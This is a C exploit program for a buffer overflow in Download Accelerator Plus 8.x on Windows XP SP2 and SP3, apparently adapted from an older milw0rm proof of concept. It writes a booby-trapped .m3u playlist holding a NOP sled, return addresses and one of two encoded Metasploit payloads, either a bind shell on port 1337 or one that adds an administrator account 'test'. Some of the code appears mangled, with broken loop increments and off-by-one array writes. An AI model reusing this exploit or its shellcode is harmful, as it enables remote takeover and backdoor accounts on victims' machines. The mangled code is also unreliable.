#include <stdio.h>
#include <stdlib.h>
/*
DAP 8.x (.m3u) File BOF C Exploit for XP SP2,SP3 English
SecurityFocus Advisory:
Download Accelerator Plus (DAP) is prone to a buffer-overflow vulnerability
because it fails to perform adequate boundary checks on user-supplied input.
Successfully exploiting this issue may allow remote attackers to execute
arbitrary code in the context of the application.Failed exploit attempts
will cause denial-of-service conditions.
Vulnerability discoverd by Krystian Kloskowski (h07) <h07@interia.pl>
Original POC by h07 http://www.milw0rm.com/exploits/6030
This poc will create a "special" .m3u file that when imported in DAP and then checked with
the verifiy button will cause a buffer overflow and lead to exploitation.Run the program
with no args for usage info or just look in the code. 😛
Tested on Windows XP English sp2&sp3.
C Exploit code by Shinnok raydenxy [at] yahoo dot com
/*
/* win32_bind – EXITFUNC=seh LPORT=1337 Size=709 Encoder=PexAlphaNum http://metasploit.com */
unsigned char bind_scode[] =
"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49"
"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36"
"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34"
"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41"
"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x46\\x4b\\x4e"
"\\x4d\\x54\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x36\\x4b\\x58"
"\\x4e\\x36\\x46\\x32\\x46\\x52\\x4b\\x48\\x45\\x34\\x4e\\x43\\x4b\\x48\\x4e\\x57"
"\\x45\\x30\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x38\\x4f\\x34\\x4a\\x51\\x4b\\x48"
"\\x4f\\x35\\x42\\x32\\x41\\x50\\x4b\\x4e\\x49\\x34\\x4b\\x38\\x46\\x33\\x4b\\x38"
"\\x41\\x50\\x50\\x4e\\x41\\x43\\x42\\x4c\\x49\\x39\\x4e\\x4a\\x46\\x58\\x42\\x4c"
"\\x46\\x37\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x50\\x44\\x4c\\x4b\\x4e"
"\\x46\\x4f\\x4b\\x33\\x46\\x45\\x46\\x52\\x4a\\x42\\x45\\x57\\x45\\x4e\\x4b\\x58"
"\\x4f\\x55\\x46\\x42\\x41\\x50\\x4b\\x4e\\x48\\x56\\x4b\\x38\\x4e\\x30\\x4b\\x44"
"\\x4b\\x48\\x4f\\x55\\x4e\\x31\\x41\\x30\\x4b\\x4e\\x43\\x30\\x4e\\x52\\x4b\\x48"
"\\x49\\x38\\x4e\\x36\\x46\\x32\\x4e\\x51\\x41\\x36\\x43\\x4c\\x41\\x33\\x4b\\x4d"
"\\x46\\x36\\x4b\\x38\\x43\\x54\\x42\\x53\\x4b\\x38\\x42\\x34\\x4e\\x50\\x4b\\x58"
"\\x42\\x47\\x4e\\x51\\x4d\\x4a\\x4b\\x58\\x42\\x34\\x4a\\x50\\x50\\x55\\x4a\\x36"
"\\x50\\x58\\x50\\x34\\x50\\x50\\x4e\\x4e\\x42\\x45\\x4f\\x4f\\x48\\x4d\\x48\\x56"
"\\x43\\x55\\x48\\x56\\x4a\\x36\\x43\\x53\\x44\\x33\\x4a\\x46\\x47\\x37\\x43\\x47"
"\\x44\\x53\\x4f\\x55\\x46\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x4b\\x4c\\x4d\\x4e"
"\\x4e\\x4f\\x4b\\x53\\x42\\x35\\x4f\\x4f\\x48\\x4d\\x4f\\x55\\x49\\x48\\x45\\x4e"
"\\x48\\x56\\x41\\x48\\x4d\\x4e\\x4a\\x30\\x44\\x30\\x45\\x35\\x4c\\x36\\x44\\x50"
"\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x49\\x4d\\x49\\x30\\x45\\x4f\\x4d\\x4a\\x47\\x55"
"\\x4f\\x4f\\x48\\x4d\\x43\\x45\\x43\\x55\\x43\\x45\\x43\\x35\\x43\\x55\\x43\\x44"
"\\x43\\x45\\x43\\x34\\x43\\x55\\x4f\\x4f\\x42\\x4d\\x48\\x56\\x4a\\x36\\x45\\x50"
"\\x49\\x43\\x48\\x56\\x43\\x45\\x49\\x58\\x41\\x4e\\x45\\x49\\x4a\\x56\\x46\\x4a"
"\\x4c\\x31\\x42\\x37\\x47\\x4c\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x4c\\x36\\x42\\x31"
"\\x41\\x35\\x45\\x35\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x46\\x4a\\x4d\\x4a\\x50\\x42"
"\\x49\\x4e\\x47\\x35\\x4f\\x4f\\x48\\x4d\\x43\\x45\\x45\\x45\\x4f\\x4f\\x42\\x4d"
"\\x4a\\x36\\x45\\x4e\\x49\\x34\\x48\\x48\\x49\\x44\\x47\\x55\\x4f\\x4f\\x48\\x4d"
"\\x42\\x55\\x46\\x55\\x46\\x45\\x45\\x35\\x4f\\x4f\\x42\\x4d\\x43\\x39\\x4a\\x56"
"\\x47\\x4e\\x49\\x37\\x48\\x4c\\x49\\x37\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x45\\x45"
"\\x4f\\x4f\\x42\\x4d\\x48\\x56\\x4c\\x46\\x46\\x46\\x48\\x56\\x4a\\x46\\x43\\x46"
"\\x4d\\x46\\x49\\x38\\x45\\x4e\\x4c\\x36\\x42\\x35\\x49\\x55\\x49\\x42\\x4e\\x4c"
"\\x49\\x58\\x47\\x4e\\x4c\\x46\\x46\\x54\\x49\\x58\\x44\\x4e\\x41\\x53\\x42\\x4c"
"\\x43\\x4f\\x4c\\x4a\\x50\\x4f\\x44\\x54\\x4d\\x42\\x50\\x4f\\x44\\x34\\x4e\\x42"
"\\x43\\x59\\x4d\\x48\\x4c\\x37\\x4a\\x53\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x56"
"\\x44\\x57\\x50\\x4f\\x43\\x4b\\x48\\x41\\x4f\\x4f\\x45\\x47\\x46\\x44\\x4f\\x4f"
"\\x48\\x4d\\x4b\\x45\\x47\\x55\\x44\\x55\\x41\\x35\\x41\\x55\\x41\\x35\\x4c\\x46"
"\\x41\\x50\\x41\\x35\\x41\\x45\\x45\\x55\\x41\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x36"
"\\x4d\\x4a\\x49\\x4d\\x45\\x30\\x50\\x4c\\x43\\x45\\x4f\\x4f\\x48\\x4d\\x4c\\x46"
"\\x4f\\x4f\\x4f\\x4f\\x47\\x33\\x4f\\x4f\\x42\\x4d\\x4b\\x58\\x47\\x35\\x4e\\x4f"
"\\x43\\x58\\x46\\x4c\\x46\\x46\\x4f\\x4f\\x48\\x4d\\x44\\x55\\x4f\\x4f\\x42\\x4d"
"\\x4a\\x56\\x42\\x4f\\x4c\\x58\\x46\\x30\\x4f\\x55\\x43\\x35\\x4f\\x4f\\x48\\x4d"
"\\x4f\\x4f\\x42\\x4d\\x5a";
/* win32_adduser – PASS=test EXITFUNC=seh USER=test Size=489 Encoder=PexAlphaNum http://metasploit.com */
unsigned char user_scode[] =
"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49"
"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36"
"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34"
"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41"
"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x34"
"\\x42\\x50\\x42\\x30\\x42\\x50\\x4b\\x38\\x45\\x44\\x4e\\x33\\x4b\\x58\\x4e\\x57"
"\\x45\\x50\\x4a\\x57\\x41\\x50\\x4f\\x4e\\x4b\\x38\\x4f\\x34\\x4a\\x31\\x4b\\x58"
"\\x4f\\x35\\x42\\x52\\x41\\x50\\x4b\\x4e\\x49\\x54\\x4b\\x48\\x46\\x33\\x4b\\x48"
"\\x41\\x50\\x50\\x4e\\x41\\x53\\x42\\x4c\\x49\\x39\\x4e\\x4a\\x46\\x48\\x42\\x4c"
"\\x46\\x47\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\\x44\\x4c\\x4b\\x4e"
"\\x46\\x4f\\x4b\\x33\\x46\\x45\\x46\\x42\\x46\\x30\\x45\\x47\\x45\\x4e\\x4b\\x48"
"\\x4f\\x35\\x46\\x42\\x41\\x50\\x4b\\x4e\\x48\\x46\\x4b\\x58\\x4e\\x50\\x4b\\x54"
"\\x4b\\x58\\x4f\\x55\\x4e\\x31\\x41\\x30\\x4b\\x4e\\x4b\\x38\\x4e\\x41\\x4b\\x58"
"\\x41\\x30\\x4b\\x4e\\x49\\x48\\x4e\\x35\\x46\\x52\\x46\\x30\\x43\\x4c\\x41\\x43"
"\\x42\\x4c\\x46\\x46\\x4b\\x58\\x42\\x34\\x42\\x43\\x45\\x38\\x42\\x4c\\x4a\\x47"
"\\x4e\\x30\\x4b\\x58\\x42\\x44\\x4e\\x30\\x4b\\x58\\x42\\x57\\x4e\\x51\\x4d\\x4a"
"\\x4b\\x48\\x4a\\x36\\x4a\\x50\\x4b\\x4e\\x49\\x50\\x4b\\x48\\x42\\x48\\x42\\x4b"
"\\x42\\x30\\x42\\x30\\x42\\x30\\x4b\\x48\\x4a\\x36\\x4e\\x53\\x4f\\x55\\x41\\x43"
"\\x48\\x4f\\x42\\x36\\x48\\x45\\x49\\x58\\x4a\\x4f\\x43\\x38\\x42\\x4c\\x4b\\x47"
"\\x42\\x45\\x4a\\x36\\x42\\x4f\\x4c\\x58\\x46\\x30\\x4f\\x45\\x4a\\x36\\x4a\\x39"
"\\x50\\x4f\\x4c\\x38\\x50\\x30\\x47\\x55\\x4f\\x4f\\x47\\x4e\\x43\\x56\\x4d\\x46"
"\\x46\\x46\\x50\\x42\\x45\\x56\\x4a\\x47\\x45\\x46\\x42\\x52\\x4f\\x52\\x43\\x36"
"\\x42\\x32\\x50\\x46\\x45\\x46\\x46\\x57\\x42\\x52\\x45\\x47\\x43\\x37\\x45\\x36"
"\\x44\\x37\\x42\\x32\\x46\\x37\\x45\\x36\\x43\\x47\\x46\\x37\\x42\\x42\\x46\\x37"
"\\x45\\x36\\x43\\x37\\x46\\x37\\x42\\x52\\x4f\\x52\\x41\\x44\\x46\\x54\\x46\\x44"
"\\x42\\x52\\x48\\x42\\x48\\x32\\x42\\x32\\x50\\x36\\x45\\x56\\x46\\x57\\x42\\x42"
"\\x4e\\x36\\x4f\\x36\\x43\\x56\\x41\\x36\\x4e\\x56\\x47\\x46\\x44\\x37\\x4f\\x36"
"\\x45\\x37\\x42\\x37\\x42\\x42\\x41\\x34\\x46\\x46\\x4d\\x56\\x49\\x56\\x50\\x46"
"\\x49\\x56\\x43\\x57\\x46\\x37\\x44\\x37\\x41\\x56\\x46\\x47\\x4f\\x56\\x44\\x37"
"\\x43\\x57\\x42\\x52\\x46\\x47\\x45\\x56\\x43\\x37\\x46\\x47\\x42\\x32\\x4f\\x52"
"\\x41\\x34\\x46\\x34\\x46\\x34\\x42\\x30\\x5a";
unsigned char ra_sp2[] = "\\xcf\\xbc\\x08\\x76"; //msvcp60.dll
unsigned char ra_sp3[] = "\\xe1\\xbc\\x08\\x76"; //msvcp60.dll
unsigned char nops1[14115]; //14115 * \\x90
unsigned char nops2[30]; //30 * \\x90
int main(int argc, char **argv)
{
int i;
FILE* f;
char* ra=NULL;
char* scode=NULL;
printf("[ ] Download Accelerator Plus – DAP 8.x (.m3u) File Buffer Overflow Vulnerability\\n");
printf("[ ] Discovered by Krystian Kloskowski (h07) <h07@interia.pl>\\n");
printf("[ ] Code by Shinnok raydenxy[at]yahoo dot com\\n");
if ((argc!=3)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))||((atoi(argv[2])!=0)&&(atoi(argv[2])!=1))){
printf("Usage: %s target payload\\n",argv[0]);
printf("Where target is:\\n");
printf("0: WinXP SP2\\n");
printf("1: WinXP SP3\\n");
printf("Where payload is:\\n");
printf("0: bind shell on 1337\\n");
printf("1: add admin user \\"test\\" with password \\"test\\"\\n");
return EXIT_SUCCESS;
}
for(i=0;i<14115;i ) nops1[i]=\’\\x90\’;
nops1[14115]=\’\\0\’;
for(i=0;i<30;i ) nops2[i]=\’\\x90\’;
nops2[30]=\’\\0\’;
if(atoi(argv[1])==0) ra=ra_sp2;
else ra=ra_sp3;
if(atoi(argv[2])==0) scode=bind_scode;
else scode=user_scode;
f=fopen("sploit.m3u","wb");
fprintf(f,"http://localhost/%s%s%s%s.mp3%c%c",nops1,ra,nops2,scode,\’\\xd\’,\’\\xa\’);
fflush(f);
fclose(f);
printf("sploit.m3u created!\\n");
return EXIT_SUCCESS;
}